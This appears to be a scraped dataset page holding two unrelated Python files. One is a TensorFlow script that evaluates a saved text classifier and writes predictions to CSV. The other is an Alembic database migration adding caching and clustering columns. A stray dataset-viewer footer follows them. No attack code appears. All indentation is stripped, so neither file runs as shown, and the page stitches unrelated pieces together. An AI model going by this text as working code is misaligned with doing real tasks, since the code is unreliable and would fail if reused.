vocab_processor = learn.preprocessing.VocabularyProcessor.restore(vocab_path)
x_test = np.array(list(vocab_processor.transform(x_raw)))
print("\nEvluating...\n")
checkpoint_file = tf.train.latest_checkpoint(checkpoint_dir)
print("checkpoint file", checkpoint_file)
graph = tf.Graph()
with graph.as_default():
session_conf = tf.ConfigProto(allow_soft_placement=config.allow_soft_placement,
log_device_placement=config.log_device_placement)
sess = tf.Session(config=session_conf)
with sess.as_default():
# load the saved meta graph and restore variables
saver = tf.train.import_meta_graph("{}.meta".format(checkpoint_file))
saver.restore(sess, checkpoint_file)
# get the placeholders
input_x = graph.get_operation_by_name("input_x").outputs[0]
dropout_keep_prob = graph.get_operation_by_name("dropout_keep_prob").outputs[0]
# evaluate
predictions = graph.get_operation_by_name("output/predictions").outputs[0]
# generate batches for one epoch
batches = data_helpers.batch_iter(list(x_test), config.batch_size, 1, shuffle=False)
# collect the predictions
all_predictions = []
for x_test_batch in batches:
batch_predictions = sess.run(predictions, {input_x: x_test_batch, dropout_keep_prob: 1.0})
all_predictions = np.concatenate([all_predictions, batch_predictions])
# print accuracy if y_test is defined
if y is not None and len(y) > 0:
correct_predictions = float(sum(all_predictions == y))
print("Total number of test examples: {}".format(len(y)))
print("Accuracy: {:g}".format(correct_predictions / float(len(y))))
# save the evaluation to csv
x_raw = [x.encode("utf-8") for x in x_raw]
predictions_human_readable = np.column_stack((np.array(x_raw), all_predictions))
out_path = os.path.join(checkpoint_dir, "..", "prediction.csv")
print("Saving evaluation to {0}".format(out_path))
print(predictions_human_readable)
with open(out_path, "w")as f:
csv.writer(f).writerows(predictions_human_readable)
|
"""adding more reasons for clustering
Revision ID: 256acb048a32
Revises: e2d7db861709
Create Date: 2017-07-31 11:49:16.345244
"""
from alembic import op
import sqlalchemy as sa
revision = '256acb048a32'
down_revision = 'e2d7db861709'
branch_labels = None
depends_on = None
enum_fields = ['status_code_304', 'etag', 'etag_calculated']
def upgrade():
from sqlalchemy.dialects import postgresql
postgresql.ENUM(*enum_fields, name='cachereason')\
.create(op.get_bind())
op.add_column('feed', sa.Column('cache_support_a_im', sa.Boolean,
nullable=False, server_default='FALSE'))
op.add_column('feed', sa.Column('cache_type',
sa.Enum(*enum_fields, name='cachereason'),
nullable=True))
op.add_column('article',sa.Column('cluster_tfidf_neighbor_size',
sa.Integer(), nullable=True))
op.add_column('article', sa.Column('cluster_tfidf_with',
sa.Integer(), nullable=True))
def downgrade():
with op.batch_alter_table('feed') as batch_op:
batch_op.drop_column('cache_type')
batch_op.drop_column('cache_support_a_im')
with op.batch_alter_table('article') as batch_op:
batch_op.drop_column('cluster_tfidf_with')
batch_op.drop_column('cluster_tfidf_neighbor_size')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.